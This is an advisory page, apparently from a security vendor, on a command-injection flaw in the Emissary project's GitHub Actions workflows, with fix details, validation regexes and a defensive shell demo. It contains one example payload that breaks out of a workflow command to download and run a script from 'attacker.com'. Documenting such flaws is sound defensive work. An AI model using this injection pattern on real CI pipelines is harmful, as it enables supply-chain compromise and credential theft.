CVE-2026-35580

CVE-2026-35580 is a critical-severity command injection vulnerability in gov.nsa.emissary:emissary (maven), affecting versions < 8.39.0. It is fixed in 8.39.0.

Summary

Three GitHub Actions workflow files contained 10 shell injection points where
user-controlled workflow_dispatch inputs were interpolated directly into shell
commands via ${{ }} expression syntax. An attacker with repository write access
could inject arbitrary shell commands, leading to repository poisoning and supply
chain compromise affecting all downstream users.

Affected Files

Workflow file                          Injection points
.github/workflows/maven-version.yml    4
.github/workflows/cherrypick.yml       5
.github/workflows/maven-release.yml    1

Details

GitHub Actions ${{ }} expressions inside run: blocks are substituted before
the shell interprets the command. When a workflow_dispatch input is placed directly
in a run: block, an attacker who can trigger the workflow can break out of the
intended command and execute arbitrary code.

Example, maven-version.yml (before fix)

- name: Set the name of the branch
  run: echo "PR_BRANCH=action/${{ github.event.inputs.next_version }}" >> "$GITHUB_ENV"

A malicious input such as 1.0.0"; curl attacker.com/backdoor.sh | bash; echo "
would be interpolated directly into the shell, executing arbitrary commands with
the job's GITHUB_TOKEN permissions (contents: write, pull-requests: write).

PR #1286, Environment variable indirection

Replaced all direct ${{ inputs.* }} interpolation in run: blocks with
environment variable indirection. Inputs are assigned to env: at the step level,
then referenced as shell variables inside run:.

# After (safe, input is never interpreted by the shell parser)
- name: Set the name of the branch
  run: echo "PR_BRANCH=action/$IN_NEXT_VERSION" >> "$GITHUB_ENV"
  env:
    IN_NEXT_VERSION: ${{ github.event.inputs.next_version }}

PR #1288, Input validation

Added strict regex validation steps that run before any input is used:

  • maven-version.yml: Validates next_version matches ^[a-zA-Z0-9._-]+$
  • maven-release.yml: Validates release_suffix matches ^[a-zA-Z0-9._-]+$
  • cherrypick.yml: Validates commits matches ^([0-9a-f]{7,40})(\s+[0-9a-f]{7,40})*$

All jobs now also use shell: bash via defaults.run.shell to ensure consistent
shell behavior.
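The two mitigations above (environment variable indirection from PR #1286 and the allow-list regexes from PR #1288) can be exercised outside a GitHub runner. The following is an added example written for this page, not Emissary's own workflow code: it renders the command text that `${{ }}` interpolation would hand to the shell (without running it), shows that the env-variable form keeps the same input as a single literal value, and wraps the advisory's regexes in validation functions. Function names, the `echo injected` sample input and the temporary file standing in for `GITHUB_ENV` are assumptions; `\s` is written as `[[:space:]]`, which is the POSIX ERE equivalent. One detail the plain regexes do not cover on their own: `grep -E` tests each input line separately, so a value containing a newline is rejected before matching.

```shell
#!/bin/sh
# Added example for CVE-2026-35580; not Emissary's own workflow code.
# Reproduces in plain POSIX shell the two mitigations the advisory describes so the
# behaviour can be checked locally. Function names, the "injected" sample input and
# the temporary GITHUB_ENV file are assumptions made for this demo.

NL='
'

# grep -E checks each input line on its own, so a value containing a newline could
# pass if just one of its lines is clean. Reject multi-line values before matching.
single_line() {
  case "$1" in *"$NL"*) return 1 ;; esac
}

# Allow-list checks with the same patterns as PR #1288 (\s written as [[:space:]]).
validate_version() {   # next_version (maven-version.yml), release_suffix (maven-release.yml)
  single_line "$1" && printf '%s' "$1" | grep -Eq '^[a-zA-Z0-9._-]+$'
}
validate_commits() {   # commits (cherrypick.yml): whitespace-separated 7..40 char hex SHAs
  single_line "$1" && printf '%s' "$1" | grep -Eq '^([0-9a-f]{7,40})([[:space:]]+[0-9a-f]{7,40})*$'
}

# What the runner does with ${{ }}: the input is pasted into the command text before
# the shell parses it. This only renders the string the shell would receive; it never
# executes it.
render_interpolated() {
  printf 'echo "PR_BRANCH=action/%s" >> "$GITHUB_ENV"' "$1"
}

# The PR #1286 form: the input reaches the shell only as the value of an environment
# variable, so it is expanded as data after parsing and cannot split the command.
# Prints the line that ended up in the (simulated) GITHUB_ENV file.
set_pr_branch_safe() {
  github_env=$(mktemp) || return 1
  GITHUB_ENV="$github_env" IN_NEXT_VERSION="$1" \
    sh -c 'echo "PR_BRANCH=action/$IN_NEXT_VERSION" >> "$GITHUB_ENV"'
  cat "$github_env"
  rm -f "$github_env"
}

# Mirrors the fixed workflow order: validate first, then use the value.
set_pr_branch_checked() {
  validate_version "$1" || { echo "rejected next_version" >&2; return 1; }
  set_pr_branch_safe "$1"
}

# Demo when run directly: sh this_file.sh --demo
if [ "${1-}" = "--demo" ]; then
  echo "shell would see: $(render_interpolated '1.0.0"; echo injected; echo "')"
  set_pr_branch_checked '1.0.0' || true
  set_pr_branch_checked '1.0.0"; echo injected; echo "' || true
fi
```

Running the demo shows the interpolated form turning one `echo` into three separate commands, while the env-variable form writes `PR_BRANCH=action/1.0.0"; echo injected; echo "` to the file as one inert line and the validation gate rejects that input before it is used at all.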

Workarounds

There is no workaround other than upgrading. Organizations that have forked
Emissary should apply the same environment variable indirection and input
validation patterns to their workflow files.

References

Impact

  • Arbitrary code execution within the CI/CD runner
  • Repository modification via the contents: write token (push malicious commits)
  • Supply chain poisoning, downstream users who clone or build receive compromised code
  • Credential exfiltration from the GitHub Actions environment

Untrusted input is inserted into a command that is later executed by the application, allowing the attacker to alter the intent of that command. Typical impact: arbitrary command execution in the application's environment.

CVE-2026-35580 has a CVSS score of 9.1 (Critical). The vector is network-reachable, high privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (8.39.0); upgrading removes the vulnerable code path.

Affected versions

gov.nsa.emissary:emissary (< 8.39.0)

Security releases

gov.nsa.emissary:emissary → 8.39.0 (maven)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Fixed in two PRs merged into release 8.39.0: PR #1286 (environment variable indirection) and PR #1288 (input validation).

Frequently Asked Questions

  1. What is CVE-2026-35580? CVE-2026-35580 is a critical-severity command injection vulnerability in gov.nsa.emissary:emissary (maven), affecting versions < 8.39.0. It is fixed in 8.39.0. Untrusted input is inserted into a command that is later executed by the application, allowing the attacker to alter the intent of that command.
  2. How severe is CVE-2026-35580? CVE-2026-35580 has a CVSS score of 9.1 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of gov.nsa.emissary:emissary are affected by CVE-2026-35580? gov.nsa.emissary:emissary (maven) versions < 8.39.0 are affected.
  4. Is there a fix for CVE-2026-35580? Yes. CVE-2026-35580 is fixed in 8.39.0. Upgrade to this version or later.
  5. Is CVE-2026-35580 exploitable, and should I be worried? Whether CVE-2026-35580 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-35580 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-35580? Upgrade gov.nsa.emissary:emissary to 8.39.0 or later.

Other vulnerabilities in gov.nsa.emissary:emissary

  • CVE-2026-35582
  • CVE-2026-35581
  • CVE-2026-35580
  • CVE-2026-35571
  • CVE-2025-27508
